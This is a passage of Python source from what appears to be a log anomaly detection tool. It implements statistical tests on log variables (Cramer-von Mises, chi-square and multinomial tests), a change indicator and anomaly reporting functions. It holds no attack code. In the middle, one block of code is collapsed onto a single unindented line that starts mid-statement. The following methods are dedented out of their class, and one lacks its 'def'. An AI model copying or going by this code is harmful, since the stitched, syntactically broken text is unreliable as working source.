                        self.var_type[event_index][var_index][4] - self.var_type[event_index][var_index][3]) >\
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta2']:
                    return [False, 1]
                estimated_min = min(self.var_type[event_index][var_index][3], min_upd)
                estimated_max = max(self.var_type[event_index][var_index][4], max_upd)
                test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                                 estimated_min) / (estimated_max - estimated_min), 'beta', args=(2, 5))
            elif self.var_type[event_index][var_index][5] == 4:
                # Weighted mean of the stored ev (num_init values) and the mean of the new values (num_s_gof_values values)
                ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean(
                    self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (
                    self.num_init + self.num_s_gof_values)
                estimated_min = min(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]),
                                    self.var_type[event_index][var_index][3])
                # Check if the estimated min and max differ more than the critical distance and return a negative test result
                # ['beta4'][0] bounds the shift of the minimum, ['beta4'][1] the ratio between the old and the updated ev
                if (abs(min(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                        self.var_type[event_index][var_index][3]) >
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or (
                        max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) >
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]):
                    return [False, 1]
                test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                                 estimated_min) / (ev_upd-estimated_min) * (1 / (5 + 1)-self.min_mod_upd_beta4) +
                                                self.min_mod_upd_beta4, 'beta', args=(1, 5))
            elif self.var_type[event_index][var_index][5] == 5:
                # Mirror image of shape 4, anchored at the maximum instead of the minimum
                ev_upd = (self.var_type[event_index][var_index][1] * self.num_init + np.mean(
                    self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) * self.num_s_gof_values) / (
                    self.num_init + self.num_s_gof_values)
                estimated_max = max(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]),
                                    self.var_type[event_index][var_index][4])
                # Check if the estimated min and max differ more than the critical distance and return a negative test result
                if (abs(max(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                        self.var_type[event_index][var_index][4]) >
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][0]) or (
                        max(ev_upd / self.var_type[event_index][var_index][1], self.var_type[event_index][var_index][1] / ev_upd) >
                        self.crit_dist_upd_cm[self.s_gof_alpha][self.num_init][self.num_s_gof_values]['beta4'][1]):
                    return [False, 1]
                test_statistic = cramervonmises((np.array(self.event_type_detector.values[event_index][var_index][-self.num_s_gof_values:]) -
                                                 estimated_max) / (estimated_max - ev_upd) * (1 / (5 + 1)-self.min_mod_upd_beta4) + 1 -
                                                self.min_mod_upd_beta4, 'beta', args=(5, 1))
        else:
            # Any other var type is compared against the stored quantiles with a two-sample CM-test
            test_statistic = cramervonmises2(self.distr_val[event_index][var_index], self.event_type_detector.values[event_index][
                var_index][-self.num_s_gof_values:])
        if first_distr:
            if test_statistic > crit_value:
                return [False, test_statistic]
            return [True, test_statistic]
        if test_statistic > crit_value:
            return [False, 1.0]
        return [True, 0.0]
    def d_test(self, event_index, var_index):
        """
        Make a test if the new variables follow the discrete distribution and append the result to the BT.

        The last self.num_update values of the variable are counted per known discrete value and tested against the
        stored distribution; which test runs depends on self.used_multinomial_test ('MT', 'Chi' or 'Approx', any other
        value does nothing). The outcome (1 = passed, 0 = failed) is shifted into self.bt_results[event_index][var_index][0],
        dropping its oldest entry.
        @param event_index index of the event type.
        @param var_index index of the variable within the event type.
        """
        if self.used_multinomial_test == 'MT':
            # Count the appearance of the values
            values_app = [0] * len(self.var_type[event_index][var_index][1])
            for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]:
                values_app[self.var_type[event_index][var_index][1].index(v)] += 1
            # probability of the values or the test sample
            prob_of_sample = self.bt_results[event_index][var_index][1].pmf(values_app)
            # Sum of the probabilities, which are smaller than the probability of the values
            # (an exact multinomial p-value, enumerated over all count vectors summing to num_update)
            # NOTE(review): the enumeration only covers 2 to 5 discrete values; with more values smaller_prob_sum stays 0
            # and the test below always records a failure, with a single value the nested loops call pmf with five
            # entries - confirm whether those cases can occur for a 'd' var type.
            smaller_prob_sum = 0
            if len(self.var_type[event_index][var_index][1]) <= 5:
                for a in range(self.num_update + 1):
                    if len(self.var_type[event_index][var_index][1]) == 2:
                        tmp_prob = self.bt_results[event_index][var_index][1].pmf([a, self.num_update - a])
                        if tmp_prob <= prob_of_sample:
                            smaller_prob_sum += tmp_prob
                    else:
                        for b in range(self.num_update - a + 1):
                            if len(self.var_type[event_index][var_index][1]) == 3:
                                tmp_prob = self.bt_results[event_index][var_index][1].pmf([a, b, self.num_update - (a + b)])
                                if tmp_prob <= prob_of_sample:
                                    smaller_prob_sum += tmp_prob
                            else:
                                for c in range(self.num_update - (a + b) + 1):
                                    if len(self.var_type[event_index][var_index][1]) == 4:
                                        tmp_prob = self.bt_results[event_index][var_index][1].pmf(
                                            [a, b, c, self.num_update - (a + b + c)])
                                        if tmp_prob <= prob_of_sample:
                                            smaller_prob_sum += tmp_prob
                                    else:
                                        for d in range(self.num_update - (a + b + c) + 1):
                                            tmp_prob = self.bt_results[event_index][var_index][1].pmf(
                                                [a, b, c, d, self.num_update - (a + b + c + d)])
                                            if tmp_prob <= prob_of_sample:
                                                smaller_prob_sum += tmp_prob
            # Make a multinomial test
            if smaller_prob_sum < self.d_alpha:
                self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0]
                return
            self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1]
            return

        if self.used_multinomial_test == 'Chi':
            # Count the appearance of the values
            values_app = [0] * len(self.var_type[event_index][var_index][1])
            for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]:
                values_app[self.var_type[event_index][var_index][1].index(v)] += 1
            # Make a chisquare test
            # Expected counts are the stored probabilities scaled to num_update; [1] of the result is the p-value
            if chisquare(values_app, f_exp=[i * self.num_update for i in self.var_type[event_index][var_index][2]])[1] < \
                    self.d_alpha:
                self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0]
                return
            self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1]
            return

        # Make an approximated multinomial test which consists of binomial tests
        if self.used_multinomial_test == 'Approx':
            # Count the appearance of the values
            values_app = [0] * len(self.var_type[event_index][var_index][1])
            for v in self.event_type_detector.values[event_index][var_index][-self.num_update:]:
                values_app[self.var_type[event_index][var_index][1].index(v)] += 1
            # Makes for each value a twosided BT. If one fails the d-test fails
            # bt_results[1] / bt_results[2] hold the per-value lower / upper count limits set up in d_init_bt
            for i, value in enumerate(values_app):
                if value < self.bt_results[event_index][var_index][1][i] or value > self.bt_results[event_index][var_index][2][i]:
                    self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [0]
                    return
            self.bt_results[event_index][var_index][0] = self.bt_results[event_index][var_index][0][1:] + [1]
            return
    def d_init_bt(self, event_index, var_index):
        """
        Initialize the BT for discrete variables.

        Sets self.bt_results[event_index][var_index] depending on self.used_multinomial_test:
        'MT'     -> [results, multinomial(num_update, probabilities)]
        'Approx' -> [results, lower_limit_list, upper_limit_list]
        other    -> [results]
        where results is a list of self.num_d_bt ones (no failed test yet) and probabilities are the stored
        appearance probabilities self.var_type[event_index][var_index][2].
        @param event_index index of the event type.
        @param var_index index of the variable within the event type.
        """
        probabilities = self.var_type[event_index][var_index][2]
        results = [1] * self.num_d_bt

        if self.used_multinomial_test == 'MT':
            # Keep the multinomial distribution object whose pmf the exact test evaluates
            self.bt_results[event_index][var_index] = [results, multinomial(self.num_update, probabilities)]
        elif self.used_multinomial_test == 'Approx':
            # Two-sided limits per value: the lower limit is derived from the complementary probabilities
            lower_limit_list = self.num_update - self.bt_min_successes_multi_p(
                self.num_update, 1 - np.array(probabilities), self.d_alpha / 2, event_index, var_index)
            upper_limit_list = self.bt_min_successes_multi_p(
                self.num_update, probabilities, self.d_alpha / 2, event_index, var_index)
            self.bt_results[event_index][var_index] = [results, lower_limit_list, upper_limit_list]
        else:
            self.bt_results[event_index][var_index] = [results]
self.var_type_history_list[event_index]: self.var_type_history_list[event_index] = [[[], [], [[], []], [], [], [], [[], []], [[], []]] for _ in range(len( self.var_type[event_index]))] # Append the first entries to the history list # Test only the variables with paths in the target_path_list if self.target_path_list is None: index_list = range(self.length[event_index]) # Test all variables else: index_list = self.variable_path_num[event_index] for var_index in index_list: # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. 
    def get_indicator(self, event_index):
        """
        Calculate and returns a indicator for a change in the system behaviour based on the analysis of VTD.

        For every variable of the event type the last self.num_var_type_considered_ind history steps are compared with the
        stored reference self.var_type_history_list_reference[event_index][var_index]; only increases of a type's share
        (the current history above the reference) contribute.
        @param event_index index of the event type.
        @return a list with one non-negative indicator per variable; variables that are not checked get 0.
        """
        # List which stores the single indicators for the variables
        indicator_list = []
        for var_index, var_val in enumerate(self.var_type_history_list[event_index]):
            if not self.event_type_detector.check_variables[event_index][var_index]:
                indicator_list.append(0)
                continue
            # List, which stores the differences of probabilities of the types, where the current history is higher than the reference.
            diff_list = []
            # Length of the reference
            len_ref = self.num_var_type_hist_ref
            # Length of the current historylist
            len_cur = self.num_var_type_considered_ind
            # Appends the positive differnces of the probabilities to diff_list
            for type_index, type_val in enumerate(var_val):
                # A variable whose reference was purely static (index 1) but is not static any more counts as a full change;
                # the condition does not depend on type_index, so it triggers on the first iteration if at all.
                if self.var_type_history_list_reference[event_index][var_index][1] == len_ref and sum(var_val[1]) < len_cur:
                    diff_list.append(1)
                    break
                # Differentiation of the entries, which are lists (e.g. discrete, range, continuously distributed)
                if type_index in [2, self.var_type_history_list_order.index('range'), self.var_type_history_list_order.index('cont')]:
                    if type_index == self.var_type_history_list_order.index('cont'):
                        # Continuously distributed variable type
                        # type_val[0] holds the means, type_val[1] the standard deviations per step (0 when not continuous)
                        if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0:
                            # No continuous reference: the share of continuous steps in the current history is the difference
                            diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                        else:
                            # Average mean / sd over the steps that actually were continuous
                            var_type_ev = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][
                                -self.num_var_type_considered_ind:] if x != 0]), 1)
                            var_type_sd = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][
                                -self.num_var_type_considered_ind:] if x != 0]), 1)
                            # Formula to include the impact of the mean, standard deviation and changes of the distribution
                            # (relative change of the mean, relative change of the sd and a constant, each weighted 1/3,
                            # scaled by the share of continuous steps)
                            if max(self.var_type_history_list_reference[event_index][var_index][type_index][1], var_type_sd) > 0:
                                diff_list.append((min(1, abs((self.var_type_history_list_reference[event_index][var_index][
                                    type_index][0] - var_type_ev) / max(abs(self.var_type_history_list_reference[event_index][var_index][
                                        type_index][0]), abs(var_type_ev))) / 3 + abs((self.var_type_history_list_reference[event_index][
                                            var_index][type_index][1] - var_type_sd) / max(abs(self.var_type_history_list_reference[
                                                event_index][var_index][type_index][1]), abs(var_type_sd))) / 3 + 1 / 3) * len([
                                                    x for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0])) / len_cur)
                            else:
                                diff_list.append(0)
                    elif type_index == self.var_type_history_list_order.index('range'):
                        # range type
                        if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0:
                            diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                        else:
                            # Calculate the lower and upper limits
                            lower_limit_cur = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][
                                -self.num_var_type_considered_ind:] if x != 0]), 1)
                            upper_limit_cur = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][
                                -self.num_var_type_considered_ind:] if x != 0]), 1)
                            lower_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][0]
                            upper_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][1]
                            # Check if the current history contains at least one range type
                            if lower_limit_cur != upper_limit_cur:
                                # Check if the two intervalls intercept
                                if (upper_limit_ref > lower_limit_cur) and (upper_limit_cur > lower_limit_ref):
                                    # Share of the union interval that lies outside the reference, scaled by the share of range steps
                                    diff_list.append(
                                        (max(0, lower_limit_ref - lower_limit_cur) + max(0, upper_limit_cur - upper_limit_ref)) /
                                        (max(upper_limit_cur, upper_limit_ref) - min(lower_limit_cur, lower_limit_ref)) *
                                        len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                                else:
                                    # Disjoint intervals: every range step counts
                                    diff_list.append(len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur)
                            else:
                                diff_list.append(0)
                    else:
                        # Discrete type (index 2): largest positive share difference over its two lists
                        tmp_max = 0
                        for j, val in enumerate(type_val):
                            if j == 0 and self.var_type_history_list_reference[event_index][var_index][type_index][j] == 0:
                                tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur -
                                                        self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref))
                            else:
                                tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur -
                                                        self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref) / 2)
                        diff_list.append(tmp_max)
                else:
                    # Plain flag lists (others, static, asc, desc, unique)
                    if self.var_type_history_list_reference[event_index][var_index][type_index] == 0:
                        # Type never seen in the reference: its full current share counts
                        diff_list.append(sum(type_val[-self.num_var_type_considered_ind:]) / len_cur)
                    else:
                        # Type known in the reference: only half of the positive share difference counts
                        diff_list.append(max(0, (sum(type_val[-self.num_var_type_considered_ind:]) / len_cur -
                                                 self.var_type_history_list_reference[event_index][var_index][type_index] / len_ref)) / 2)
            if len(diff_list) == 0:
                indicator_list.append(0)
            else:
                indicator_list.append(sum(diff_list))
        return indicator_list
# The methods below belong to the detector class whose header precedes this span (the `def` keyword of the first one is
# the last token of the preceding span); they are shown dedented because the surrounding class context is not visible here.
bt_min_successes(self, num_bt, p, alpha):  # skipcq: PYL-R0201
    """
    Calculate the minimal number of successes for the BT with significance alpha.

    p is the probability of success and num_bt is the number of observed tests.
    The loop accumulates the binomial probability of observing at most i failures (i.e. at least num_bt - i successes);
    the first i at which that cumulative probability exceeds alpha yields the answer num_bt - i. If alpha is never
    exceeded, 0 is returned.
    NOTE(review): np.math is only an alias of the math module (deprecated since NumPy 1.25, removed in NumPy 2.0);
    math.factorial / math.comb are the drop-in replacements. The true division of two large factorials can also
    overflow to OverflowError for very large num_bt.
    """
    tmp_sum = 0.0
    max_observations_factorial = np.math.factorial(num_bt)
    i_factorial = 1
    for i in range(num_bt + 1):
        # Running i!; max(i, 1) keeps 0! == 1.
        i_factorial = i_factorial * max(i, 1)
        # Binomial term C(num_bt, i) * (1 - p)^i * p^(num_bt - i): probability of exactly i failures.
        tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * np.math.factorial(num_bt - i)) * ((1 - p) ** i) * (
            p ** (num_bt - i))
        if tmp_sum > alpha:
            return num_bt - i
    return 0

def bt_min_successes_multi_p(self, num_bt, p_list, alpha, event_index, var_index):
    """
    Calculate the minimal number of successes for the BT with significance alpha.

    p_list is a list of probabilities of successes and num_bt is the number of observed tests.
    @return a numpy array with one minimal success count per probability.
    """
    if f'num_bt = {num_bt}, alpha = {alpha}' in self.bt_min_succ_data:
        # Here the min_successes are not being generated, but instead the right Indices are searched for in the bt_min_succ_data-list
        return np.searchsorted(self.bt_min_succ_data[f'num_bt = {num_bt}, alpha = {alpha}'], p_list, side='left', sorter=None)
    # Calculate the min_successes normally for each value one by one
    tmp_list = []
    # NOTE(review): the loop bound is the length of self.var_type[event_index][var_index][1], not len(p_list); the two are
    # presumably always equal here — confirm, otherwise p_list[i] can raise IndexError.
    for i in range(len(self.var_type[event_index][var_index][1])):  # skipcq: PTC-W0060
        tmp_list.append(self.bt_min_successes(num_bt, p_list[i], alpha))
    tmp_list = np.array(tmp_list)
    return tmp_list

def print_initial_var_type(self, event_index, log_atom):
    """
    Print the initial variable types.

    Builds one 'Path ...: <type>' line per variable with a detected type and sends it to all anomaly_event_handlers
    together with the raw log data. Nothing is emitted while output is silenced.
    """
    if self.silence_output_without_confidence or self.silence_output_except_indicator:
        return
    # Undecodable raw data is reported through its repr() instead of failing the detector.
    try:
        data = log_atom.raw_data.decode(AminerConfig.ENCODING)
    except UnicodeError:
        data = repr(log_atom.raw_data)
    message = f'Initial detection of variable types of event {self.event_type_detector.get_event_type(event_index)}:'
    tmp_string = ''
    type_info = {}
    for var_index in range(self.length[event_index]):
        if self.var_type[event_index][var_index]:
            tmp_string += f" Path '{self.event_type_detector.variable_key_list[event_index][var_index]}': " \
                          f"{get_vt_string(self.var_type[event_index][var_index])}\n"
            type_info[self.event_type_detector.variable_key_list[event_index][var_index]] = self.var_type[event_index][var_index]
    tmp_string = tmp_string.lstrip(' ')
    original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
    if self.output_logline:
        sorted_log_lines = [tmp_string + original_log_line_prefix + data]
        analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())}
    else:
        sorted_log_lines = [tmp_string + data]
        # NOTE(review): var_index is the leftover loop variable from above, so only the last variable's path is reported
        # here although type_info covers all of them; presumably list(type_info.keys()) was intended — confirm.
        analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]}
    if self.event_type_detector.id_path_list != []:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': type_info, 'IDpaths': self.event_type_detector.id_path_list,
                      'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])}
    else:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': type_info}
    for listener in self.anomaly_event_handlers:
        listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self)

def print_changed_var_type(self, event_index, vt_old, vt_new, var_index, log_atom, confidence=None):
    """
    Print the changed variable types.

    @param vt_old the previous variable type list (vt_old[0] is the type name).
    @param vt_new the new variable type list.
    @param confidence when None and silence_output_without_confidence is set, nothing is printed.
    """
    # Statistics bookkeeping happens before the silence check so that silenced output is still counted.
    if self.save_statistics and ((self.num_updates_until_var_reduction > 0 and (
            self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >=
            self.num_updates_until_var_reduction - 1)):
        self.changed_var_types.append(self.event_type_detector.num_event_lines[event_index])
    if (self.silence_output_without_confidence and confidence is None) or self.silence_output_except_indicator:
        return
    try:
        data = log_atom.raw_data.decode(AminerConfig.ENCODING)
    except UnicodeError:
        data = repr(log_atom.raw_data)
    original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
    if self.output_logline:
        # List every parsed path, one per line, in front of the original log line.
        tmp_str = ''
        for x in list(log_atom.parser_match.get_match_dictionary().keys()):
            tmp_str += ' ' + x + os.linesep
        tmp_str = tmp_str.lstrip(' ')
        sorted_log_lines = [tmp_str + original_log_line_prefix + data]
        analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())}
    else:
        sorted_log_lines = [
            ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data]
        analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]}
    if self.event_type_detector.id_path_list:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]},
                      'IDpaths': self.event_type_detector.id_path_list,
                      'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])}
    else:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}}
    vt_old_string = get_vt_string(vt_old)
    vt_new_string = get_vt_string(vt_new)
    for listener in self.anomaly_event_handlers:
        listener.receive_event(
            f'Analysis.{self.__class__.__name__}',
            f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event "
            f"{self.event_type_detector.get_event_type(event_index)} changed from { vt_old_string} to {vt_new_string} after the "
            f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self)

def print_reject_var_type(self, event_index, vt, var_index, log_atom):
    """
    Print that a variable type would be rejected.

    Same output layout as print_changed_var_type, but 'TypeInfo' carries a single 'reject' entry with vt[0].
    """
    if self.silence_output_without_confidence or self.silence_output_except_indicator:
        return
    try:
        data = log_atom.raw_data.decode(AminerConfig.ENCODING)
    except UnicodeError:
        data = repr(log_atom.raw_data)
    original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
    if self.output_logline:
        tmp_str = ''
        for x in list(log_atom.parser_match.get_match_dictionary().keys()):
            tmp_str += ' ' + x + os.linesep
        tmp_str = tmp_str.lstrip(' ')
        sorted_log_lines = [tmp_str + original_log_line_prefix + data]
        analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())}
    else:
        sorted_log_lines = [
            ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data]
        analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]}
    if self.event_type_detector.id_path_list != []:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]},
                      'IDpaths': self.event_type_detector.id_path_list,
                      'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])}
    else:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}}
    for listener in self.anomaly_event_handlers:
        listener.receive_event(
            f'Analysis.{self.__class__.__name__}',
            f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event "
            f"{self.event_type_detector.get_event_type(event_index)} would reject the type '{vt[0]}' after the "
            f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self)

def print(self, message, log_atom, affected_path,
          confidence=None, indicator=None):
    """
    Print the message.

    Generic anomaly output: the message plus the affected paths and the raw log line go to all anomaly_event_handlers.
    @param affected_path a single path or a list of paths (a str is wrapped into a one-element list).
    @param confidence / indicator optional values reported in 'TypeInfo'; when the corresponding silence_* flag is set
    and the value is None, nothing is printed.
    Note that this method shadows the builtin print() only as an attribute name; module-level print() is unaffected.
    """
    if isinstance(affected_path, str):
        affected_path = [affected_path]
    if (self.silence_output_without_confidence and confidence is None) or (
            self.silence_output_except_indicator and indicator is None):
        return
    try:
        data = log_atom.raw_data.decode(AminerConfig.ENCODING)
    except UnicodeError:
        data = repr(log_atom.raw_data)
    original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
    if self.output_logline:
        tmp_str = ''
        for x in list(log_atom.parser_match.get_match_dictionary().keys()):
            tmp_str += ' ' + x + os.linesep
        tmp_str = tmp_str.lstrip(' ')
        sorted_log_lines = [tmp_str + original_log_line_prefix + data]
        analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())}
    else:
        tmp_str = ''
        for x in affected_path:
            tmp_str += ' ' + x + os.linesep
        tmp_str = tmp_str.lstrip(' ')
        sorted_log_lines = [tmp_str + data]
        analysis_component = {'AffectedLogAtomPaths': affected_path}
    if self.event_type_detector.id_path_list != []:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}, 'IDpaths': self.event_type_detector.id_path_list,
                      'IDvalues': list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index])}
    else:
        event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records,
                      'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}}
    for listener in self.anomaly_event_handlers:
        listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self)

def log_statistics(self, component_name):
    """
    Log statistics of an AtomHandler.

    Override this method for more sophisticated statistics output of the AtomHandler.
    The counters (log_success, log_total, log_new_learned, log_new_learned_values, log_updated) are reset after logging,
    whatever the configured STAT_LEVEL is.
    @param component_name the name of the component which is printed in the log line.
    """
    if AminerConfig.STAT_LEVEL == 1:
        logging.getLogger(STAT_LOG_NAME).info(
            "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the "
            "last 60 minutes.", component_name, self.log_success, self.log_total, self.log_new_learned, self.log_updated)
    elif AminerConfig.STAT_LEVEL == 2:
        logging.getLogger(STAT_LOG_NAME).info(
            "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the "
            "last 60 minutes. Following new variable types were learned: %s", component_name, self.log_success, self.log_total,
            self.log_new_learned, self.log_updated, self.log_new_learned_values)
    self.log_success = 0
    self.log_total = 0
    self.log_new_learned = 0
    self.log_new_learned_values = []
    self.log_updated = 0


def convert_to_floats(list_in):
    """
    Return the entries of list_in converted to float, or an empty list if any entry cannot be converted.

    @param list_in iterable of values accepted by float().
    @return list of floats, or [] on the first ValueError/TypeError (the partial result is discarded).
    """
    num_list = []
    for item in list_in:
        try:
            num_list.append(float(item))
        except (ValueError, TypeError):
            return []
    return num_list


def consists_of_floats(list_in):
    """Give back false if one entry of the list is no float or integer.
True otherwise."""
    return all(isinstance(x, (float, int)) for x in list_in)


def consists_of_ints(list_in):
    """
    Give back True if all entries are integers and False otherwise.

    An entry counts as an integer when it equals its int() conversion, so 2.0 (and True/False) qualify as well.
    Non-numeric entries make int() raise (ValueError/TypeError); there is no guard for that here.
    """
    return all(item == int(item) for item in list_in)


def get_vt_string(vt):
    """
    Return a string which states the variable type with selected parameters.

    @param vt variable type list; vt[0] is the type name and the meaning of the following entries depends on it
    (see the individual branches).
    @return a human readable description; an unknown type name is returned unchanged.
    """
    if vt[0] == 'stat':
        return_string = f'{vt[0]} {vt[1]}'
    elif vt[0] == 'd':
        # Discrete type: vt[1] holds the values and vt[2] their probabilities. Values below 10% are summarised as '...'.
        return_string = vt[0] + ' ['
        for i, val in enumerate(vt[2]):
            if val >= 0.1:
                return_string += f'"{str(vt[1][i])}"({str(int(val*100+0.5))}%), '
        if any(val < 0.1 for _, val in enumerate(vt[2])):
            return_string += '...]'
        else:
            # Strip the trailing ', ' of the last listed value.
            # NOTE(review): with an empty vt[2] this also strips the ' [' and yields 'd]' — presumably never empty here.
            return_string = return_string[:-2]
            return_string += ']'
    elif vt[0] in ('asc', 'desc'):
        return_string = f'{vt[0]} [{vt[1]}]'
    elif vt[0] == 'unq':
        return_string = vt[0]
    elif vt[0] == 'others':
        return_string = vt[0]
    elif vt[0] == 'range':
        return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]'
    elif vt[0] == 'uni':
        return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]'
    elif vt[0] == 'nor':
        return_string = f'{vt[0]} [EV: {vt[1]}, SD: {vt[2]}]'
    elif vt[0] == 'spec':
        return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]'
    elif vt[0] == 'beta':
        # Beta variant 1 is described by its bounds, all other variants by mean and standard deviation.
        if vt[5] == 1:
            return_string = f'{vt[0]}{vt[5]} [min: {vt[3]}, max: {vt[4]}]'
        else:
            return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]'
    elif vt[0] == 'betam':
        return_string = f'{vt[0]} [min: {vt[3]}, max: {vt[4]}, proportion: {vt[5]}]'
    else:
        return_string = vt[0]
    return return_string


def cramervonmises(rvs, cdf, args=()):
    """
    Return the cramer von mises gof test statistic.

    @param rvs one-dimensional sample (anything np.asarray accepts).
    @param cdf a callable cdf(x, *args), or the name of a distribution that is looked up on the module-level
    `distributions` object (imported above this span; presumably scipy.stats.distributions — confirm).
    @param args extra parameters passed through to cdf.
    @raise ValueError if the sample has fewer than two observations or more than one dimension.
    """
    if isinstance(cdf, str):
        cdf = getattr(distributions, cdf).cdf
    vals = np.sort(np.asarray(rvs))
    if vals.size <= 1:
